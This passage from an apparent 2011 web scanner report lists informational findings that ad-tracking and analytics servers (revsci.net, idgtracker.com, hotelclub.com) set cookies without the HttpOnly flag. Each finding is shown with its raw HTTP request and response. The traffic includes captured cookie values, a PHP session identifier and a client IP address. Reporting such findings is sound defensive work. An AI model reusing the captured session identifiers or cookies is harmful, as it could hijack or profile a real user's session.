Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGYsK3+DY1l13C02rTIRBqQ2OYiHGvze9j90z9N83Xdojeb1YEtuFtjInUpdmlemjXlXYGda/XzQEydWdgrHQN7q3VqUbfIOKWrXlkTYsltuQI8qsrJ2srKwKzN0Z0jMjqK585ynCYNVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZRxamLFOMb90Wvul5zWvyY11S1DyTuvYjqSYxDegoCowgeBBAG7+Xf6gDVV2QPzWFHYpGlYl3P4ZX9CpI+vgLYBPxtTTKVwIUl10sBi/44VOSWRq1H76DFQxw4mb75x/5h13Vj0wCTGJjg7TaZoA4M6vWoTrIQuQtCdyjKRdfs/I5MBHJtw2LW7PqooQ/iC6GOaO7hnD53acPYEykGdbLM6NJMcS9nKJvJsxcM+1WzrEtX+Cbxv1yl+5/H2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM3oIfcBF/T5SCBT9xRQBi+EOsjbUOlrkD/R1gThqaHXoloO+cDpDWYMdqMr2m82XWUceApd540S2Jzb5dkP1yq0s2L+ysv93dxCG9MV8zDAMz2B/owKqEvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcHm2URkNHlZEiJTsz3JNnyi9NMRQSIatUASNyRzzhCImJqFxMUe9tdOjnlPjgGMtp5D+wc6ngXj5Iuz2lpF9rGuXDTDcTWp2NQU+nbFujm8qqTy6ResY3hsjgQijnWwjJB5j5LitAMxrk4fIjbcsHnW99MOBjiwVC9IOjc4cv6I/wm3tLiNhIBPThtOxWjcdljVM6n7CXuYaexrvdo06GoF3KEx44vkVU3TGis/Y96/swQJZXEHrZP11kChpj/b/jCI0sM00hIWy3sXVjyzG51eCP+KiXsOLcBCnQDPBwU+ZxZblipsN3CjeXYELsPCPWQMtJq/E2S/tGoB9YPYzU4FYs+9UtKa7cuKAFa576O/fMh9uP1/6zhP4EZBmhu0JXmu+j9eYoBao="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:35 GMT


14.27. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NlSe="MLsXr08uMT5n4BD3bLua7kUHKxycqFuHHYWrQ4CcmI8DWfWhTlgNS3bAhAe5Ek6MTKFNTT5xYaf4SRDbPGD9pzbuj7m3W9LehF9HBn8KpH5maLzmo/IEYGm7ZsUglwRaDpS5XjA7brvD0QxRDVCLNbezOsf0yoqeO4c9EfAZWEqBka72ko6UicWuG1yTBBss9ckcEDqRZwS4RMHgTDyNbZtXdwEX5eFl3+RCbqZ+L5dJtYUpZZz6Q6z8dXjprrK/cKVEi+YyPq9Z14+HRRl2OLIVdWQbBiBD/7TuEYKhZnZfNuGiEAKk+jB3BMi6NjJ/X4+zFjN4JIVambd/JpUPzroQ0nl7LNG8eII/VzxFlhp4C3BW5XBxBS+tnLnyILAgwEQIeWrRbOj1i8mDDDnMo6DH5j2110rT0dL2EQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtea7ubdYdxLy/lJT87u7OZ5hB4giwRLN67eJ02IAcpR9TattCy1Zb/ZGpqmMoG8gcE7LQ6jRkwYJBMpzLVaLXE2wLlSuQot46gmeeqQPhHlUjaPpsrgyHurE0UGdaGp3HtPfYQ0zoxLNvYWePVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZR3aN0Q5peAGU44tgNRwckUHjN35lSoNd85yzoKZUuAE9pP2A+YQfoGhYngbrTf8bwilg368Sy3x8qoPLnh3X53wX8I/IETXdm5bpdAoE2hTTZ6K1H0VU/gQAwoaXw+iPHX2eAIdHHdoaYpmT+ERLJsiANnM9Z5EFziSdC96w48tMQoukW4Ksl1ZOopa7GC8HPFVaD6t3U32r9sbTyZkKK8QA8JbzsDvfwIxbEP2PUVHeXmSSxv1yl+5zD2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM0aOTW2BlGO9zv4pDblC5CNIG8rXO1JkD/C3oThuUHWYhoeO8DtDWYMdqMr2m9VrGEceghR5JD3D8RHf7LpHhsuJx3jJotF3dxCG7MV8zDAMz2B/rQJKMvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcXm2URkNHzlWjj0emnFiAyQHyCPxWKWPn7u21hzyVmNjG99yAYWX+wAazYRfFR/c8+aIvtHtKLiK9T5jCISpw2ZmX4RnayGawcJnnPsCNUloDfJ0JTMwujfD6FlxPPXvlu380sfvmSiRjZvQCuIB370j6Ksga3WpNkZQkX3KGJU3hM+yZb5MzFP5k5bsnJ55jGqCtm0c6Mi0rqxK9yOEGjkcPV/zGQXuqqJMtWozTmjQ2ukOQWf0aZ2mu2NrC05+ZgOoOQt2UIjUKH5vWWG5ekz2hDMNgjVap5KFmOT3Cz5jpI4zA90AVCQTPC3swcaxfRCaPlIafa8pX4vh5WMEVqajOSPgq3gvJ1//x8UgIOQfpJr5p0lQkqGP3RDrUzvdEy1l0+YhekA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:25 GMT


14.28. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:55 GMT


14.29. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=14&pub=300009&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6; uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: uid14=205557652-20110423230924-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:24 GMT; path=/
Location: http://www.identityguard.com/gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.30. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:00 GMT; path=/
Location: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.31. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:09:49 GMT
Server: Omniture DC/2.0.0
